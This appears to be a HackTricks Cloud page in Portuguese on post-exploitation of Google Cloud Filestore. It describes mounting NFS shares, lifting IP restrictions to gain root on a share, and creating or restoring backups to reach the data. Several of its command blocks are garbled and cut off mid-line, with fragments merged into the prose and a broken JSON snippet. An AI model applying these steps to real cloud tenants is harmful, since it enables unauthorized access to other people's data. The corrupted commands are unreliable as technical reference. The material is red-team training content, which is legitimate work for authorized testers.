GCP - Filestore Post Exploitation
Tip
Aprenda e pratique AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoie o HackTricks
- Check the subscription plans!
- Participe do 💬 Discord group ou do telegram group ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe hacking tricks enviando PRs para os HackTricks e HackTricks Cloud github repos.
Filestore
Para mais informações sobre o Filestore consulte:
Mount Filestore
Um sistema de arquivos compartilhado pode conter informações sensíveis interessantes do ponto de vista de um atacante. Com acesso ao Filestore é possível montá-lo:
Mount Filestore filesystem
```bash sudo apt-get update sudo apt-get install nfs-common # Check the share name showmount -ePara encontrar o endereço IP de uma instância Filestore, verifique a seção de enumeração da página:
Remover restrições e obter permissões extras
Se o attacker não estiver em um endereço IP com acesso ao share, mas você tiver permissões suficientes para modificá‑lo, é possível remover as restrições de acesso. Também é possível conceder mais privilégios ao seu endereço IP para obter acesso admin ao share:
Atualizar instância Filestore para permitir acesso
```bash gcloud filestore instances update nfstest \ --zone=Contents of nfs.json
{
“–file-share”:
{
“capacity”: “1024”,
“name”: “
</details>
### Restaurar um backup
Se houver um backup, é possível **restaurá-lo** em uma instância existente ou em uma nova instância para que sua **informação fique acessível:**
<details>
<summary>Criar nova instância e restaurar backup</summary>
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29
# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>
# Follow the previous section commands to mount it
Criar um backup e restaurá-lo
Se você não tem acesso a um share e não quer modificá-lo, é possível criar um backup dele e restaurá-lo como mencionado anteriormente:
Criar backup e restaurar em nova instância
```bash # Create share backup gcloud filestore backups createFollow the previous section commands to restore it and mount it
</details>
> [!TIP]
> Aprenda e pratique AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Apoie o HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Participe do** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) ou do [**telegram group**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Compartilhe hacking tricks enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>
HackTricks Cloud

